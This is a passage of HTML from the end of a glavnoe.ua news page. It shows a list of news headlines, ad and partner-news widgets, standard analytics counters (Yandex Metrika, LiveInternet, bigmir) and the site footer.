href="//glavnoe.ua/news/n357009221-juzhnaja-koreja-i-ssha-otlozhili-sovmestnye-uchenija-iz-za-nedovolstva-kndr"></a><div class="newstime">17:51</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009221-juzhnaja-koreja-i-ssha-otlozhili-sovmestnye-uchenija-iz-za-nedovolstva-kndr">Южная Корея и США отложили совместные учения из-за недовольства КНДР</a><span class="views">394</span></div></div></div><div class="newsitem with-image"><a class="link-wrapper" href="//glavnoe.ua/news/n357009220-v-ukraine-budet-prodavatsja-rastitelnoe-mjaso-beyond-meat"></a><div class="newstime">17:31</div><div class="info"><div class="image"><img src="/media/images/news/03/57/00/92/20/357009220_43x43.jpg" alt="В Украине будет продаваться растительное мясо Beyond Meat"></div><div class=newstitle><a href="//glavnoe.ua/news/n357009220-v-ukraine-budet-prodavatsja-rastitelnoe-mjaso-beyond-meat">В Украине будет продаваться растительное мясо Beyond Meat</a><span class="views">767</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009219-v-tbilisi-tysjachi-ljudej-vyshli-na-akcii-protesta"></a><div class="newstime">17:26</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009219-v-tbilisi-tysjachi-ljudej-vyshli-na-akcii-protesta">В Тбилиси тысячи людей вышли на акции протеста</a><span class="views">551</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009218-iz-lvova-budet-hodit-ezhednevnyj-poezd-v-berlin"></a><div class="newstime">17:18</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009218-iz-lvova-budet-hodit-ezhednevnyj-poezd-v-berlin">Из Львова будет ходить ежедневный поезд в Берлин</a><span class="views">625</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009217-v-venecii-snizhaetsja-uroven-vody-posle-novogo-pika-navodnenija"></a><div class="newstime">16:54</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009217-v-venecii-snizhaetsja-uroven-vody-posle-novogo-pika-navodnenija">В Венеции снижается уровень воды после нового пика наводнения</a><span class="views">456</span></div></div></div><div class="newsitem last important"><a class="link-wrapper" href="//glavnoe.ua/news/n357009216-v-rf-podtverdili-peredachu-ukraine-zahvachennyh-korablej"></a><div class="newstime">16:34</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009216-v-rf-podtverdili-peredachu-ukraine-zahvachennyh-korablej">В РФ подтвердили передачу Украине захваченных кораблей</a><span class="views">714</span></div></div></div><a class="more" href="/news/">больше новостей</a>
</div>
</div>
</div>

<div class="padded hidden">
<div class="body">
<div class="ad-240x400" id="ads-block-2">
</div>
</div>
</div>
</div>
</div>

</div>

<div class="ad-970x90 padded" id="ads-block-bottom">
</div>


<div class="headed-block padded">
<div class="headed-block padded">
<div class="red header">новости партнеров</div>
<script class="r37700" type="text/javascript">
    (function() {
        var worker37700,
            tickerID = 37700,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r37700'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's37700');
            script.setAttribute('data-idn', idn);
            script.src = '//js-ru.redtram.com/n4p/0/37/ticker_37700.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
        tag.parentNode.insertBefore(script, tag);
    })();
</script>




</div>
</div>

</div>
</div>
</div>

<div class="fixed_left_ads"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-7444186690923849" data-ad-slot="3301207666"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

<div class="fixed_right_ads">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-7444186690923849" data-ad-slot="2232517668"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
<script type="text/javascript" src="/orphus/orphus.js"></script>
<div class="full-width-wrapper" id="bottom-block">
<div class="content-block">
<footer id="footer">
<div id="title">
<span class="copy-years">&copy; 2007&mdash;2019</span> Интернет-обозрение Главное&trade;
</div>
<div id="credentials">
<p>При использовании материалов с сайта Главное&trade; гиперссылка на источник обязательна.</p>
<p><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="aec0cbd9ddeec9c2cfd8c0c1cb80dbcf">[email&#160;protected]</a> - для связи с редакцией,</p>
<p><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="daa8bfb1b6bbb7bb9abdb6bbacb4b5bff4afbb">[email&#160;protected]</a> - для рекламодателей.</p>
<p>Редакция не всегда разделяет мнение авторов.</p>

</div>
<div id="links">
<div>
<p>
<a href="/news/politics/">политика</a>
<a href="/news/economics/">экономика</a>
<a href="/news/society/">общество</a>
<a href="/news/culture/">культура</a>
<a href="/news/health/">здоровье</a>
<a href="/news/science/">наука</a>
<a href="/news/accidents/">происшествия</a>
<a href="/news/sports/">спорт</a>
<a href="/news/interest/">интересно</a>
</p>
</div>
</div>
<div id="counters">
<div>
<noindex>

<a href="https://metrika.yandex.ru/stat/?id=53589895&amp;from=informer" target="_blank" rel="nofollow"><img src="https://informer.yandex.ru/informer/53589895/3_0_FFFFFFFF_EFEFEFFF_0_pageviews" style="width:88px; height:31px; border:0;" alt="Яндекс.Метрика" title="Яндекс.Метрика: данные за сегодня (просмотры, визиты и уникальные посетители)" class="ym-advanced-informer" data-cid="53589895" data-lang="ru" /></a>


<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(53589895, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        webvisor:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/53589895" style="position:absolute; left:-9999px;" alt="" /></div></noscript>

<script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/stat/glavnoe.ua/' "+
"target=_blank><img src='//counter.yadro.ru/hit?t17.3;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,80))+";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script>

<script type="text/javascript" language="javascript">
function BM_Draw(oBM_STAT){
document.write('<table cellpadding="0" cellspacing="0" border="0" style="display:inline;margin-right:4px;"><tr><td><div style="margin:0px;padding:0px;font-size:1px;width:88px;"><div style="background:url(\'https://i.bigmir.net/cnt/samples/diagonal/b59_top.gif\') no-repeat bottom;"></div><div style="font:10px Tahoma;background:url(\'https://i.bigmir.net/cnt/samples/diagonal/b59_center.gif\');"><div style="text-align:center;"><a href="http://top.bigmir.net/report/170451/" target="_blank" style="color:#0000ab;text-decoration:none;font:10px Tahoma;">bigmir<span style="color:#ff0000;">)</span>net</a></div><div style="margin-top:3px;padding: 0px 6px 0px 6px;color:#003596;"><div style="float:left;font:10px Tahoma;">'+oBM_STAT.hosts+'</div><div style="float:right;font:10px Tahoma;">'+oBM_STAT.hits+'</div></div><br clear="all"/></div><div style="background:url(\'https://i.bigmir.net/cnt/samples/diagonal/b59_bottom.gif\') no-repeat top;"></div></div></td></tr></table>');
}
</script>
<script type="text/javascript" language="javascript">
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={o:1,v:170451,s:170451,t:0,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[ovstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<sc'+'ript type="text/javascript" language="javascript" src="//c.bigmir.net/?'+bs.join('&')+'"></sc'+'ript>');
</script>
<noscript>
<a href="http://top.bigmir.net/report/170451/" target="_blank"><img src="//c.bigmir.net/?v170451&s170451&t2" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript>

</noindex>
</div>
</div>
</footer>
</div>
</div>
<script>
$(document).ready(function (){
// scroll top

	jQuery('.btn-top').on('click', function(){
		$('html, body').animate({
			scrollTop: 0
		}, 500);
	});
	function showBtn(){
		if($(document).scrollTop()>200){
			jQuery('body').addClass('scroll');
			jQuery('.fixed_right_ads, .fixed_left_ads').css('position','fixed');
			jQuery('.fixed_right_ads, .fixed_left_ads').css('margin-top','0');
		}
		else {
			jQuery('body').removeClass('scroll');
			jQuery('.fixed_right_ads, .fixed_left_ads').css('position','absolute');
			jQuery('.fixed_right_ads, .fixed_left_ads').css('margin-top','200px');
		}
	}
	showBtn();
	jQuery(window).scroll(showBtn);

// photo captions
$(".newstext img").each(function() {
    var imageCaption = $(this).attr("title");
    if (imageCaption) {
        //var imgWidth = $(this).width();
        var imgHeight = $(this).height();
        //var position = $(this).position();
        var positionTop = (imgHeight - 26)
        $("<div class='img-caption'>" + imageCaption + "</div>").css({
	    "margin-top": positionTop + "px",
            "left": "0"
        }).insertAfter(this);
    }
});

});
</script>
<span class="btn-top"><i class="fa fa-caret-up"></i></span>

<div style="display: none;">delta = Array
(
[1] => 0.00075411796569824
[2] => 0.040763139724731
)
</div>

<script src="/assets/js/cookiealert.js"></script>
</body>
</html>